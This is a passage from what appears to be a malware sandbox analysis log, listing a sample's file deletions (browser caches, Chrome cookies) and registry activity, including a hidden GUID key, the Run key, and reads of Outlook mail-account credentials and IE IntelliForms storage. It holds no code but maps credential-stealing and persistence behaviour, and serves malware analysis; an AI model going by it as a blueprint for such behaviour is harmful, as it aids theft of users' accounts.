Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4613B437E86D18E98F830433A5E6F7F9ABAF3693 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\467A961D019F23E5AF0F0266CD78A5F3D3290E5B - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\489059ED134C75D04357FD895C6280E1F7978C59 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\48D18A403364708B74676D0C5068809EE47BCF43 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\491836973BD7F16266314A8709EF00934A1BFCA0 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\491FFC0D1E910DC1DB3107E7DA730B43A97010A0 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4A46AC76F0CCC4293CC380999116F3B7911F85BE - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4B18B5ADA8BF2E475961694931BE215AED8ECBD5 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4B2A0DFA12FEADFF375261309F704B43534BEE37 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4BB6AC032612F432B6B5DA43EE2DAA6A8A03B6F4 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4C7EAEF07520B2C9900CFE06971368FF939AA197 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4CAD791F9C35BB747A46BAC7BE30A1E3BC028262 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4CF1AED5BBD3500653D8E2D1ACE09C58CF2D6182 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4DCE88D30F65C9460CC26665BC0A65F3234FA3D4 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4DEBFBF420A31CFDD61418B1BE3ADB580389730E - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4EFB15999EE57EDBFAADF69D6A31D8C6F90FE8DC - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4F0C54EEF677196E2899E5E79B4F3A906E46F926 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4F21DDD23480F1D4FBA13115BADB18B9AD18D8B1 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4F372C9418B79051ABED288900CDF3D20C12F38C - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4F680E68B8C682B5D2540FA7BE7B7F0D7521D9C9 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4F78D1F2D9B48D34C6259CF59FD5E171B97EFB3A - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4FC872C4A3A8739207D005A676C19DAB518FA53B - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\514D7C625328106E43CEC7FD7CF71AEDA0A3101F - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\522FF036651FEA29F227BFB14BD934175DDBA62A - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\5289F8C4AB5388DE2FCD562674EDF6674FB6DD30 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\529CD0D4C166C4989BAABA7E5FF50F75FB1D22D3 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\52ECE00B624C0C246123D20C46C3EE4F390A42FE - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\539C21F72CC831D883A265394E7125EFC208B096 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\53DAE4B1D7BFF6744CCAF7207DE631267F9883DC - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\53E9CAA90A10C82CF9C2D5393B332D17B263105E - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\54BF6D9D46D035228AC887ABC41B451F2BA38C02 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\5588A68FFECF7B388E18C33727BF06B30B837DF1 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\559737B84286037BF56FE9E46C53581FB6FF6751 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\56945BFE2B00EED1BE4F7B1F389030A0AF203742 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\56B48B214C8C7AC2CE81EFC4F92C4550FB675AE9 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\56C1D667A6AFD5406F830882D54923461E079C1B - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\5740B2DD533A74C3D20DD1D045CF7090D3BFB1AC - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\577655B6F15A0EEA0864C0703652DE24C091B634 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\5781F439935B6472D7D312E75A3B766C3E30CF60 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\579EC9227C4A988DCC4894D82AA161957107515D - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\57E662573FD9E42D3972BE92D3DF0557C7B2E836 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\57FB9388D9B054D289CC913E797B5C5217B6A217 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\58A845FD76589B14EF62BB6CFEA62DB0C7CCFBBE - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\58BFE77FA719F36CE48D4A317C753C845C38FE29 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\59248032DB55D8A9E0296A51BC66F3DEA6028EA5 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\592BC6129BB410343931D35AFB0FE270C66E58F0 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\59BB52B352DE6D0ED5D0376B33855D43CA80B3F7 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\59D05F1B38666C8EF68BDEE20A28647F754464F6 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\5A39FCB4CCAE4A6C76307026D7C882B4AE85B1F9 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\5A6EEC1674DA4669A4FF612E7924A91FBF501426 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\5AF1F43361120818C2E543605F5DF938574B1EDC - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\5B1B55B57E2440A52DE3FED7E02C83E04A78B0FD - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\5B928BD544BA66929A709C6AEC9D5968DCB905A1 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\5BDDE6C7804D11CE399AF314C3D33E47FBAE7C88 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\5C30F12D68A505E4AE0A6A3D896A1EC9C549AE96 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\5D3D330EFBD2B9CD6EB45919D9403F605414EFA5 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000001 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000002 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000003 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000004 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000005 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000006 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000007 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000008 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000009 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000a - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000b - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000c - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000d - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000e - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000f - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000010 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000011 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000012 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000013 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000014 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000015 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000016 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000017 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000018 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001a - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001b - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001c - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001d - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001e - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001f - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\index - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cookies - True 1
Fn
Delete C:\Users\CIIHMN~1\AppData\Roaming\MICROS~1\{25E2F~1\setup.inf - True 1
Fn
Delete C:\Users\CIIHMN~1\AppData\Roaming\MICROS~1\{25E2F~1\setup.rpt - True 1
Fn
Delete C:\Users\CIIHMN~1\AppData\Local\Temp\1A70.bin - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{25E2F79F-402D-9FBF-7229-7443C66DE827}\01D4756785E0F97F09 - True 1
Fn
Registry (2883)
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 - True 1
Fn
Create Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 - True 1
Fn
Create Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530\Files - True 1
Fn
Create Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 - True 2
Fn
Open Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 - True 2
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 - True 2
Fn
Open Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\SecureBrain\PhishWall - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 - True 2
Fn
Open Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 - True 2
Fn
Open Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530\Run - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Account Manager - True 2
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts - False 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings - False 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - False 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook - False 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook - False 24
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\03fea8ae12202041b643a9691e5b323c - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab - True 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 - True 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a - True 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 - True 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 - True 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec - True 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 - True 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 - True 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 - True 57
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 - True 6
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 - True 32
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 - True 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 - True 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e - True 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 - True 63
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 - False 63
Fn
Open Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Mozilla - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\TaskBarIDs - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\53.0.3 (x86 en-GB) - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\53.0.3 (x86 en-GB)\Main - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\53.0.3 (x86 en-GB)\Uninstall - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 53.0.3 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 53.0.3\bin - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 53.0.3\extensions - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530\Files - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 - True 4
Fn
Read Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = Ini, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = Install, type = REG_BINARY True 2
Fn
Data
Read Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = Client, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = ProductID, data = 48 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = ProductName, data = 87 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = CurrentVersion, data = 54 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = InstallDate, data = 65 True 1
Fn
Read Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = {111F6A44-3C4D-6BC7-CED5-30CFE2D96473}, type = REG_NONE False 1
Fn
Read Value TreatAs type = REG_NONE False 27
Fn
Read Value - data = 0 True 49
Fn
Read Value - data = PSFactoryBuffer True 9
Fn
Read Value - value_name = InprocServer32 False 23
Fn
Read Value - data = C:\Windows\System32\BitsProxy.dll True 5
Fn
Read Value - value_name = ThreadingModel, data = Both True 14
Fn
Read Value InprocHandler32 - False 27
Fn
Read Value InprocHandler - False 27
Fn
Read Value - value_name = ThreadingModel, data = both True 2
Fn
Read Value - data = psfactorybuffer True 1
Fn
Read Value - value_name = ActivationType, type = REG_NONE True 4
Fn
Read Value - value_name = Threading, type = REG_NONE True 2
Fn
Read Value - value_name = TrustLevel, type = REG_NONE True 4
Fn
Read Value - value_name = ActivateAsUser, type = REG_NONE False 4
Fn
Read Value - data = Network List Manager True 1
Fn
Read Value - value_name = Threading, type = REG_NONE False 2
Fn
Read Value - value_name = IdentityType, type = REG_NONE True 1
Fn
Read Value - value_name = Permissions, type = REG_NONE True 1
Fn
Read Value - value_name = ServerType, type = REG_NONE True 1
Fn
Read Value - data = C:\Windows\System32\\Windows.StateRepository.dll True 1
Fn
Read Value - - False 1
Fn
Read Value - data = C:\Windows\system32\windowscodecs.dll True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows value_name = DisplayVersion, type = REG_NONE False 59
Fn
Read Value HKEY_CURRENT_USER\Control Panel\Desktop value_name = PaintDesktopVersion, type = REG_NONE True 59
Fn
Read Value - data = ShellItem Shell Namespace helper True 1
Fn
Read Value - data = C:\Windows\system32\windows.storage.dll True 3
Fn
Read Value - data = Shared Task Scheduler True 1
Fn
Read Value - value_name = ThreadingModel, data = Apartment True 7
Fn
Read Value - data = Immersive Shell True 1
Fn
Read Value - data = C:\Windows\System32\ActXPrxy.dll True 2
Fn
Read Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = {36CFCEF2-1DFD-D85B-57CA-A18C7B9E6580}, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Account Manager value_name = Outlook, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = SMTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = SMTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = POP3 Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = POP3 User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = SMTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = NNTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = NNTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = NNTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = IMAP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = IMAP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = Email False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = HTTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = HTTP Server URL False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = POP3 User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = IMAP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = HTTPMail User Name False 2
Fn
